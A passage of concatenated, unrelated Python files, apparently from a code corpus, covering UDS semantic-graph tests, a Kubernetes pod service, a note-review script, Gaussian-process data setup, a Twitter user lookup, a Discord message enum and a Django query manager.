'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'existed_during': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'instigation': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'partitive': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'sentient': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'volition': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'was_for_benefit': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'was_used': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}}},
'type': 'dependency'},
('tree1-semantics-pred-20', 'tree1-semantics-arg-23'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-7', 'tree1-semantics-arg-11'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-7', 'tree1-semantics-arg-3'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'change_of_location': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'change_of_possession': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'change_of_state': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'change_of_state_continuous': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'existed_after': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'existed_before': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'existed_during': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'instigation': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'partitive': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'sentient': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'volition': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'was_for_benefit': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'was_used': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}}},
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-0'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-addressee'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-author'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'}}
@pytest.fixture
def graph_syntax_edges():
return {('tree1-root-0', 'tree1-syntax-7'): {'deprel': 'root',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-10'): {'deprel': 'aux',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-13'): {'deprel': 'dobj',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-15'): {'deprel': 'nmod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-16'): {'deprel': 'punct',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-20'): {'deprel': 'advcl',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-8'): {'deprel': 'mark',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-9'): {'deprel': 'nsubj',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-13', 'tree1-syntax-12'): {'deprel': 'nummod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-15', 'tree1-syntax-14'): {'deprel': 'case',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-20', 'tree1-syntax-17'): {'deprel': 'mark',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-20', 'tree1-syntax-18'): {'deprel': 'expl',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-20', 'tree1-syntax-19'): {'deprel': 'aux',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-20', 'tree1-syntax-23'): {'deprel': 'nsubj',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-23', 'tree1-syntax-21'): {'deprel': 'det',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-23', 'tree1-syntax-22'): {'deprel': 'amod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-23', 'tree1-syntax-26'): {'deprel': 'nmod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-26', 'tree1-syntax-24'): {'deprel': 'case',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-26', 'tree1-syntax-25'): {'deprel': 'det',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-26', 'tree1-syntax-28'): {'deprel': 'nmod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-28', 'tree1-syntax-27'): {'deprel': 'case',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-3', 'tree1-syntax-1'): {'deprel': 'det',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-3', 'tree1-syntax-2'): {'deprel': 'compound',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-3', 'tree1-syntax-6'): {'deprel': 'nmod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-6', 'tree1-syntax-4'): {'deprel': 'case',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-6', 'tree1-syntax-5'): {'deprel': 'compound',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-7', 'tree1-syntax-11'): {'deprel': 'ccomp',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-7', 'tree1-syntax-29'): {'deprel': 'punct',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-7', 'tree1-syntax-3'): {'deprel': 'nsubj',
'domain': 'syntax',
'type': 'dependency'}}
@pytest.fixture
def graph_query_results():
return {('tree1-semantics-pred-7', 'tree1-semantics-arg-3'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': 1.0,
'value': 1.3526},
'change_of_location': {'confidence': 0.272,
'value': -0.0922},
'change_of_possession': {'confidence': 0.7724,
'value': -0.0},
'change_of_state': {'confidence': 0.2067,
'value': -0.0548},
'change_of_state_continuous': {'confidence': 1.0,
'value': -0.0},
'existed_after': {'confidence': 1.0,
'value': 1.3527},
'existed_before': {'confidence': 1.0,
'value': 1.3527},
'existed_during': {'confidence': 1.0,
'value': 1.3557},
'instigation': {'confidence': 1.0,
'value': 1.3557},
'partitive': {'confidence': 0.1148,
'value': -0.0018},
'sentient': {'confidence': 1.0,
'value': 1.354},
'volition': {'confidence': 1.0,
'value': 1.3545},
'was_for_benefit': {'confidence': 0.1976,
'value': -0.0504},
'was_used': {'confidence': 0.4373,
'value': -0.0207}},
'type': 'dependency'}}
class TestUDSSentenceGraph:
def test_sentence(self, normalized_sentence_graph,
raw_sentence_graph, graph_sentence):
assert normalized_sentence_graph.sentence == graph_sentence
assert raw_sentence_graph.sentence == graph_sentence
def test_syntax_nodes(self, normalized_sentence_graph, raw_sentence_graph, graph_syntax_nodes):
assert normalized_sentence_graph.syntax_nodes == graph_syntax_nodes
assert raw_sentence_graph.syntax_nodes == graph_syntax_nodes
def test_normalized_semantics_nodes(self, normalized_sentence_graph,
graph_normalized_semantics_nodes):
assert normalized_sentence_graph.semantics_nodes ==\
graph_normalized_semantics_nodes
def test_raw_semantics_nodes(self, raw_sentence_graph,
graph_raw_semantics_nodes):
assert raw_sentence_graph.semantics_nodes ==\
graph_raw_semantics_nodes
def test_syntax_edges(self, normalized_sentence_graph,
raw_sentence_graph, graph_syntax_edges):
assert normalized_sentence_graph.syntax_edges() == graph_syntax_edges
assert raw_sentence_graph.syntax_edges() == graph_syntax_edges
def test_normalized_semantics_edges(self, normalized_sentence_graph,
graph_normalized_semantics_edges):
assert normalized_sentence_graph.semantics_edges() ==\
graph_normalized_semantics_edges
def test_raw_semantics_edges(self, raw_sentence_graph, graph_raw_semantics_edges):
assert raw_sentence_graph.semantics_edges() ==\
graph_raw_semantics_edges
def test_maxima(self, normalized_sentence_graph, raw_sentence_graph):
assert normalized_sentence_graph.maxima() == ['tree1-semantics-pred-root']
assert raw_sentence_graph.maxima() == ['tree1-semantics-pred-root']
noroot_normalized = [nid for nid in normalized_sentence_graph.nodes
if nid != 'tree1-semantics-pred-root']
noroot_raw = [nid for nid in raw_sentence_graph.nodes
if nid != 'tree1-semantics-pred-root']
assert normalized_sentence_graph.maxima(noroot_normalized) == ['tree1-semantics-arg-0',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']
assert raw_sentence_graph.maxima(noroot_raw) == ['tree1-semantics-arg-0',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']
noperformative_normalized = [nid for nid in normalized_sentence_graph.nodes
if nid not in ['tree1-semantics-pred-root',
'tree1-semantics-arg-0',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']]
noperformative_raw = [nid for nid in raw_sentence_graph.nodes
if nid not in ['tree1-semantics-pred-root',
'tree1-semantics-arg-0',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']]
assert normalized_sentence_graph.maxima(noperformative_normalized) == ['tree1-root-0',
'tree1-semantics-pred-7',
'tree1-semantics-pred-20']
assert raw_sentence_graph.maxima(noperformative_raw) == ['tree1-root-0',
'tree1-semantics-pred-7',
'tree1-semantics-pred-20']
def test_minima(self, normalized_sentence_graph, raw_sentence_graph):
assert normalized_sentence_graph.minima() == ['tree1-syntax-1',
'tree1-syntax-2',
'tree1-syntax-4',
'tree1-syntax-5',
'tree1-syntax-8',
'tree1-syntax-9',
'tree1-syntax-10',
'tree1-syntax-12',
'tree1-syntax-14',
'tree1-syntax-16',
'tree1-syntax-17',
'tree1-syntax-18',
'tree1-syntax-19',
'tree1-syntax-21',
'tree1-syntax-22',
'tree1-syntax-24',
'tree1-syntax-25',
'tree1-syntax-27',
'tree1-syntax-29',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']
assert raw_sentence_graph.minima() == ['tree1-syntax-1',
'tree1-syntax-2',
'tree1-syntax-4',
'tree1-syntax-5',
'tree1-syntax-8',
'tree1-syntax-9',
'tree1-syntax-10',
'tree1-syntax-12',
'tree1-syntax-14',
'tree1-syntax-16',
'tree1-syntax-17',
'tree1-syntax-18',
'tree1-syntax-19',
'tree1-syntax-21',
'tree1-syntax-22',
'tree1-syntax-24',
'tree1-syntax-25',
'tree1-syntax-27',
'tree1-syntax-29',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']
def test_query(self, normalized_sentence_graph, graph_query_results):
querystr = """
SELECT ?edge
WHERE { ?node ?edge ?arg ;
<domain> <semantics> ;
<type> <predicate> ;
<pred-particular> ?predparticular
FILTER ( ?predparticular > 0 ) .
?arg <domain> <semantics> ;
<type> <argument> ;
<arg-particular> ?argparticular
FILTER ( ?argparticular > 0 ) .
{ ?edge <volition> ?volition
FILTER ( ?volition > 0 )
} UNION
{ ?edge <sentient> ?sentient
FILTER ( ?sentient > 0 )
}
}
"""
assert normalized_sentence_graph.query(querystr, query_type='edge') == graph_query_results
def test_to_from_dict(self, normalized_sentence_graph, raw_sentence_graph):
in_then_out = normalized_sentence_graph.from_dict(normalized_sentence_graph.to_dict(), 'tree1').to_dict()
assert normalized_sentence_graph.to_dict() == in_then_out
assert in_then_out == normalized_sentence_graph.from_dict(in_then_out, 'tree1').to_dict()
def test_constructing_rdf_for_graph_with_raw_annotations_fails(self, raw_sentence_graph):
graph = raw_sentence_graph
assert hasattr(graph, '_rdf') == False # RDF not yet built
# attempt to build RDF
with pytest.raises(TypeError):
graph.rdf
|
11546289
|
from setuptools import setup
setup(
name="aorist_recipes",
version="0.0.1",
packages=["aorist_recipes"],
zip_safe=False,
include_package_data=True,
package_data={"aorist_recipes": ["aorist_recipes/*"],},
long_description="""
Recipes for aorist package.
""",
long_description_content_type="text/x-rst"
)
|
11546308
|
from __future__ import annotations
import asyncio
import typing as t
from aiohttp import StreamReader
from sentry_sdk import capture_exception
from ...exceptions import K8SEmptyPodIp
from ..log import logger
from ..pod_event import PodEventService
from ..task_runner import TaskRunnerService
from .client import K8sClient
if t.TYPE_CHECKING:
from kubernetes_asyncio.client import V1Pod, V1Status # type: ignore
class K8sService:
def __init__(self,
k8s_client: K8sClient,
namespace: str,
pod_event_service: PodEventService,
task_runner_service: TaskRunnerService,
) -> None:
self.k8s_client = k8s_client
self.namespace = namespace
self.pod_event_service = pod_event_service
self.task_runner_service = task_runner_service
async def run_background_tasks(self) -> None:
await self.task_runner_service.run_in_background(self.watch_ready_pods)
async def api_is_available(self) -> bool:
try:
await self.k8s_client.get_api_versions()
except Exception as e:
logger.exception(e)
return False
else:
return True
async def get_pod(self, name: str) -> V1Pod:
return await self.k8s_client.get_pod(namespace=self.namespace, name=name)
async def create_pod(self, spec: t.Dict[str, t.Any]) -> V1Pod:
return await self.k8s_client.create_pod(namespace=self.namespace, spec=spec)
async def delete_pod(self, name: str) -> V1Status:
return await self.k8s_client.delete_pod(namespace=self.namespace, name=name)
async def watch_ready_pods(self) -> None:
while True:
try:
async for pod_name in self.k8s_client.watch_pod_ready_events(namespace=self.namespace):
# pod_name is unique: we set the generateName property in the pod manifest,
# so K8s guarantees a unique name for every pod
event = self.pod_event_service.get_or_create_event(pod_name)
event.set()
except asyncio.CancelledError:
raise
except Exception as e:
logger.exception(e)
capture_exception(e)
await asyncio.sleep(1)  # brief back-off before re-establishing the watch after an error
async def wait_until_pod_is_ready(self, pod_name: str) -> None:
event = self.pod_event_service.get_or_create_event(pod_name)
await event.wait()
self.pod_event_service.clean(pod_name)
async def get_pod_logs_stream(self, name: str) -> StreamReader:
return await self.k8s_client.get_pod_logs_stream(namespace=self.namespace, name=name)
@staticmethod
def get_node_name(pod: V1Pod) -> str:
return pod.spec.node_name
@staticmethod
def get_pod_ip(pod: V1Pod) -> str:
pod_ip = pod.status.pod_ip
# In some cases K8s does not return pod IP
# Need a retry on the tests side
if pod_ip is None:
raise K8SEmptyPodIp("Pod does not have an IP")
return pod_ip
@staticmethod
def get_pod_name(pod: V1Pod) -> str:
return pod.metadata.name
@staticmethod
def _get_browser_env(pod: V1Pod, env_name: str) -> t.Optional[str]:
for container in pod.spec.containers:
if container.name != 'browser' or not container.env:
continue
for env in container.env:
if env.name == env_name:
return env.value
return None
@classmethod
def get_browser_timezone(cls, pod: V1Pod) -> str:
# default https://aerokube.com/selenoid/latest/#_setting_timezone
return cls._get_browser_env(pod, 'TZ') or 'UTC'
@classmethod
def get_browser_vnc_enabled(cls, pod: V1Pod) -> bool:
# default https://github.com/aerokube/selenoid-images/blob/master/selenium/chrome/entrypoint.sh#L60
return cls._get_browser_env(pod, 'ENABLE_VNC') == 'true'
@classmethod
def get_browser_screen_resolution(cls, pod: V1Pod) -> str:
# default https://github.com/aerokube/selenoid-images/blob/master/selenium/chrome/entrypoint.sh#L2
return cls._get_browser_env(pod, 'SCREEN_RESOLUTION') or '1920x1080x24'
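# Hypothetical wiring (names are illustrative, not part of this module):
#   service = K8sService(k8s_client=client, namespace="browsers",
#                        pod_event_service=pod_events, task_runner_service=runner)
#   await service.run_background_tasks()
#   pod = await service.create_pod(spec)
#   await service.wait_until_pod_is_ready(K8sService.get_pod_name(pod))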
|
11546310
|
import datetime
import os
import pickle
import platform
import subprocess
import sys
from argparse import ArgumentParser
from collections import Counter
from math import ceil, floor, sqrt
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.axes_grid1 import make_axes_locatable
plt.rcParams["toolbar"] = "None"
NOW = datetime.datetime.now()
def plot_age_heatmap(ages_mins):
aspect_ratio = 16 / 9
# Result of minimizing number of rows for min||nrows^2 * ncols - len||_2^2
# Could be improved by cleverly choosing whether to ceil rows or cols, depending
# on which yields better coverage (this is the safe option).
num_rows = sqrt(len(ages_mins) * aspect_ratio + 4) / aspect_ratio
num_cols = aspect_ratio * num_rows
rounding_ops = [(ceil, floor), (floor, ceil), (ceil, ceil)]
coverage_errors = [
row_op(num_rows) * col_op(num_cols) - len(ages_mins)
for row_op, col_op in rounding_ops
]
coverage_errors_positive = [error if error >= 0 else np.nan for error in coverage_errors]
rounding_choice = np.nanargmin(coverage_errors_positive)
row_op, col_op = rounding_ops[rounding_choice]
num_rows = row_op(num_rows)
num_cols = col_op(num_cols)
padded_len = num_cols * num_rows
padded_ages_mins = np.array([np.nan] * padded_len)
padded_ages_mins[0 : len(ages_mins)] = ages_mins
padded_ages_days = np.round(padded_ages_mins / (60 * 24))
mode = Counter(padded_ages_days).most_common(1)[0][0]
fig, ax = plt.subplots(
num=f"{len(ages_mins)} Zettels - Median Age {np.median(ages_mins/(60*24)):.0f} days - Mode {mode:.0f} days",
)
ax.tick_params(left=False, bottom=False, labelbottom=False, labelleft=False)
ax.set_title("Days Since Last Visit To Zettel")
im = ax.imshow(
np.reshape([padded_ages_days], (num_rows, num_cols)), cmap="plasma_r",
)
cax = make_axes_locatable(ax).append_axes("right", size="5%", pad=0.1)
fig.colorbar(im, cax=cax)
fig.tight_layout()
plt.show()
def get_file_suffix(filepath):
_, suffix = os.path.splitext(filepath)
return suffix
def get_selection_probabilities(ages, importance_function):
"""
Returns the probability of each Zettel being selected. This is proportional
to the Zettel's age.
If importance_function == linear, a Zettel twice as old as another is
also twice as likely to be picked.
If importance_function == quadratic, a Zettel twice as old as another is
four times as likely to be picked, which surfaces the oldest notes faster.
If importance_function == log, a Zettel twice as old as another is only
slightly more likely to be opened for review. This is close to a uniform
probability of picking notes, except for brand-new ones.
"""
ages = np.array(ages)
if importance_function == "linear":
ages_weighted = ages
elif importance_function == "quadratic":
ages_weighted = np.power(ages, 2)
elif importance_function == "log":
ages_weighted = np.log(ages + 1) # age could be below 1
else:
raise LookupError(f"Unknown importance function: {importance_function}")
total_age = np.sum(ages_weighted)
if total_age == 0:
return np.ones_like(ages_weighted)
return ages_weighted / total_age
def main(
folder, numzettels, picklename, suffixes, visualize_only, importance_fun,
):
os.chdir(folder)
zettels = os.listdir()
zettels = [
zett
for zett in zettels
if os.path.isfile(zett) and get_file_suffix(zett) in suffixes
]
if numzettels > len(zettels):
numzettels = len(zettels)
if os.path.isfile(picklename):
with open(picklename, "rb") as fh:
zettel_dates = pickle.load(fh)
zettel_dates = {
zett_name: zett_date
for zett_name, zett_date in zettel_dates.items()
if zett_name in zettels
}
age_in_mins = {
zettel: (NOW - last_opened).total_seconds() // 60
for zettel, last_opened in zettel_dates.items()
}
else:
print(
"Couldn't find zettelwarmer database at {}. Making new one.".format(
os.path.realpath(picklename)
),
file=sys.stderr,
)
with open(picklename, "wb+") as fh:
zettel_dates = {}
age_in_mins = {}
pickle.dump(zettel_dates, fh)
oldest_age = -1
if len(age_in_mins.values()) > 0:
oldest_age = np.max(list(age_in_mins.values()))
for zett in zettels:
if zett not in age_in_mins:
age_in_mins[zett] = oldest_age
ages = np.array([age_in_mins[zett] for zett in zettels])
selection_probabilities = get_selection_probabilities(
ages, importance_function=importance_fun
)
selection_probabilities /= np.sum(selection_probabilities)
sample_zettels = np.random.choice(
zettels, size=numzettels, replace=False, p=selection_probabilities
)
plot_age_heatmap(ages)
if visualize_only:
print("Ok, not opening anything...")
return
if platform.system() == "Darwin":
open_cmd = "open"
elif platform.system() == "Linux":
open_cmd = "xdg-open"
elif platform.system() == "Windows":
open_cmd = ""
print("You're apparently using windows. I don't know if the file opening works. Please tell me if it did (please make an issue on github).")
else:
raise OSError(f"Don't know how to open files for your operating system: {platform.system()}.")
for zettel in sample_zettels:
zettel_dates[zettel] = datetime.datetime.now()
subprocess.run([open_cmd, zettel])
with open(picklename, "wb+") as fh:
pickle.dump(zettel_dates, fh)
if __name__ == "__main__":
parser = ArgumentParser(
description="Tool to revisit random Zettels from your collection. Gives more weight to old Zettels that you haven't seen in a while."
)
parser.add_argument(
"-f",
"--folder",
help="Path to folder with all the zettels in it. Defaults to current directory.",
default=".",
)
parser.add_argument(
"-n",
"--numzettels",
help="Number of Zettels to pick and open.",
default=5,
type=int,
)
parser.add_argument(
"-if",
"--importance-fun",
help="Function of age, used to weight note-picking probability. Possible values are linear, quadratic, log",
default="quadratic",
)
parser.add_argument(
"-s",
"--suffixes",
help="List of valid suffixes to consider as Zettel files. Defaults to .md",
nargs="+",
default=[".md"],
)
parser.add_argument(
"-p",
"--picklename",
help="Name of the pickle file to save file ages into. Will be saved in the Zettel folder.",
default="zettelwarmer.pickle",
)
parser.add_argument(
"-vo",
"--visualize-only",
help="Do not open or modify anything, only show the heatmap.",
action="store_true",
)
args = parser.parse_args()
params = vars(args)
main(**params)
|
11546436
|
import enum
import numpy as np
from absl import flags
from gpflow import default_float
from pssgp.experiments.common import ModelEnum, CovarianceEnum
from pssgp.toymodels import sinu, comp_sinu, rect, obs_noise
class DataEnum(enum.Enum):
SINE = "SINE"
COMPOSITE_SINE = "COMPOSITE_SINE"
RECT = "RECT"
FLAGS = flags.FLAGS
flags.DEFINE_string('model', ModelEnum.SSGP.value, 'Select model to run. Options are gp, ssgp, and pssgp.')
flags.DEFINE_string('cov', CovarianceEnum.Matern32.value, 'Covariance function.')
flags.DEFINE_string('data_model', DataEnum.SINE.value, 'What is the model for the data.')
flags.DEFINE_string('dtype', "float32", 'GPFLOW default float type.')
flags.DEFINE_integer('rbf_order', 6, 'Order of ss-RBF approximation.', lower_bound=1)
flags.DEFINE_integer('rbf_balance_iter', 10, 'Iterations of RBF balancing.', lower_bound=1)
flags.DEFINE_integer('qp_order', 6, 'Order of ss-quasiperiodic approximation.', lower_bound=1)
flags.DEFINE_float('noise_variance', 0.5, 'Variance of the noise.', lower_bound=1e-4)
def get_data(seed, n_training, n_pred):
dtype = default_float()
t = np.linspace(0, 4, n_training, dtype=dtype)
t_pred = np.linspace(0, 4, n_pred, dtype=dtype)
data_model = DataEnum(FLAGS.data_model)
if data_model == DataEnum.SINE:
data_fun = sinu
elif data_model == DataEnum.COMPOSITE_SINE:
data_fun = comp_sinu
elif data_model == DataEnum.RECT:
data_fun = rect
else:
raise ValueError("")
ft = data_fun(t)
ft_pred = data_fun(t_pred)
y = obs_noise(ft, FLAGS.noise_variance, seed)
return t.reshape(-1, 1), ft.reshape(-1, 1), t_pred.reshape(-1, 1), ft_pred.reshape(-1, 1), y.reshape(-1, 1)
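# Hypothetical usage (after absl has parsed FLAGS):
#   t, ft, t_pred, ft_pred, y = get_data(seed=0, n_training=100, n_pred=500)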
|
11546438
|
from twarc import Twarc2, expansions
import json
# Replace your bearer token below
client = Twarc2(bearer_token="<PASSWORD>")
def main():
# List of user IDs to lookup, add the ones you would like to lookup
users = ['2244994945', '783214', '6253282']
# The user_lookup function gets the hydrated user information for specified users
lookup = client.user_lookup(users=users)
for page in lookup:
result = expansions.flatten(page)
for user in result:
# Here we are printing the full Tweet object JSON to the console
print(json.dumps(user))
if __name__ == "__main__":
main()
|
11546456
|
from . import base
from .base import model
from . import hotelling
from .hotelling import Hotelling
from . import sst
from .sst import SST
|
11546467
|
from rfl_net.network import Network
import config
class XZNet(Network):
def setup(self):
(self.feed('input')
.conv(11, 11, 96, 2, 2, padding='VALID', name='conv1', relu=False)
.bn(is_train=self.is_train, relu=True, name='bn1')
.max_pool(3, 3, 2, 2, padding='VALID', name='pool1')
.conv(5, 5, 256, 1, 1, padding='VALID', name='conv2', relu=False)
.bn(is_train=self.is_train, relu=True, name='bn2')
.max_pool(3, 3, 2, 2, padding='VALID', name='pool2')
.conv(3, 3, 384, 1, 1, padding='VALID', name='conv3', relu=False)
.bn(is_train=self.is_train, relu=True, name='bn3')
.conv(3, 3, 384, 1, 1, padding='VALID', name='conv4', relu=False)
.bn(is_train=self.is_train, relu=True, name='bn4')
.conv(3, 3, 256, 1, 1, padding='VALID', name='conv5', relu=False)
.bn(is_train=self.is_train, relu=False, name='bn5'))
class FilterNet(Network):
def setup(self):
(self.feed('output')
.conv(1, 1, config.output_size, 1, 1, padding='SAME', name='conv6', relu=False))
class ConvXZNet(Network):
def setup(self):
(self.feed('z_gf', 'x_output')
.batch_conv(name='response'))
|
11546490
|
from __future__ import annotations
import enum
__all__ = ("MessageType",)
class MessageType(enum.IntEnum):
DEFAULT = 0
RECIPIENT_ADD = 1
RECIPIENT_REMOVE = 2
CALL = 3
CHANNEL_NAME_CHANGE = 4
CHANNEL_ICON_CHANGE = 5
CHANNEL_PINNED_MESSAGE = 6
GUILD_MEMBER_JOIN = 7
USER_PREMIUM_GUILD_SUBSCRIPTION = 8
USER_PREMIUM_GUILD_SUBSCRIPTION_TIER_1 = 9
USER_PREMIUM_GUILD_SUBSCRIPTION_TIER_2 = 10
USER_PREMIUM_GUILD_SUBSCRIPTION_TIER_3 = 11
CHANNEL_FOLLOW_ADD = 12
GUILD_DISCOVERY_DISQUALIFIED = 14
GUILD_DISCOVERY_REQUALIFIED = 15
GUILD_DISCOVERY_GRACE_PERIOD_INITIAL_WARNING = 16
GUILD_DISCOVERY_GRACE_PERIOD_FINAL_WARNING = 17
THREAD_CREATED = 18
REPLY = 19
CHAT_INPUT_COMMAND = 20
THREAD_STARTER_MESSAGE = 21
GUILD_INVITE_REMINDER = 22
CONTEXT_MENU_COMMAND = 23
|
11546500
|
import datetime
import re
from django import http
from django.contrib import messages
from django.core import exceptions
from django.db.models import (Avg, Case, Count, F, Q, QuerySet, Sum, When,
fields)
from django.db.models.functions import TruncMonth
from shop import utilities
class CollectionManager(QuerySet):
def active_products(self, collection_name):
collection = self.get(name__iexact=collection_name)
return collection.product_set.filter(active=True)
def products_between_price(self, collection_name, a, b):
products = self.active_products(collection_name)
price_between_a_and_b = Q(price_pre_tax__gt=a) & Q(price_pre_tax__lt=b)
return products.filter(price_between_a_and_b)
class ProductManager(QuerySet):
def active_products(self):
return self.filter(active=True, private=False)
def private_products(self):
return self.filter(private=True)
def count_products_by_collection(self):
"""Returns the count of products by collection"""
products = self.values('collection__name')
items = products.annotate(count_of=Count('name'))
return [[item['collection__name'] for item in items], [item['count_of'] for item in items]]
def average_price_by_collection(self):
"""Returns the average price by collection"""
products = self.values('collection__name')
return products.order_by('collection__name')\
                    .annotate(average_price=Avg('price_pre_tax'))
def search_product(self, searched_item):
"""
Allows the user to search for a product on
the website
"""
qfunctions = Q(name__icontains=searched_item) | Q(
collection__name__icontains=searched_item)
queryset = self.filter(qfunctions).filter(active=True)
if queryset.exists():
return queryset
return []
def advanced_search(self, searched_terms):
"""
This is an advanced search feature for the dashboard
for example
"""
queryset = self.all()
if ':' in searched_terms:
key, value = searched_terms.split(':')
if key == 'state':
if value == 'actif' \
or value == 'true' \
or value == 'True':
return queryset.filter(active=True)
elif value == 'inactif' \
or value == 'false' \
or value == 'False':
return queryset.filter(active=False)
if searched_terms.startswith('-'):
searched_terms = re.search(r'^-(?:\s?)(.*)', searched_terms).group(1)
searched_terms = ~Q(name__icontains=searched_terms) & ~Q(reference__icontains=searched_terms) \
& ~Q(collection__name__icontains=searched_terms)
else:
searched_terms = Q(name__icontains=searched_terms) | Q(reference__icontains=searched_terms) \
| Q(collection__name__icontains=searched_terms)
return queryset.filter(searched_terms)
def to_be_published_today(self):
"""Return a queryset of products that are
not published on the current date"""
current_date = datetime.datetime.now()
products = self.filter(to_be_published_on__date=current_date, active=False)
return products
def out_of_stock(self, threshold=5):
"""Return a queryset of products that are
out of stock or nearly out of stock"""
logic = (
Q(active=True) &
Q(monitor_quantity=True) &
Q(quantity__lte=threshold)
)
return self.filter(logic)
##############
#
# DASHBOARD
#
##############
class BaseStatistics(QuerySet):
def total_count(self):
return self.all().count()
|
11546541
|
import os,sys
class StartProgram(object):
def __init__(self):
pass
@staticmethod
def start(proto_path, program):
list_dirs = os.listdir(proto_path)
for proto in list_dirs:
if not proto.endswith((".exe")):
continue
if program and proto == program:
if proto_path.endswith("/"):
protofile = proto_path + proto
else:
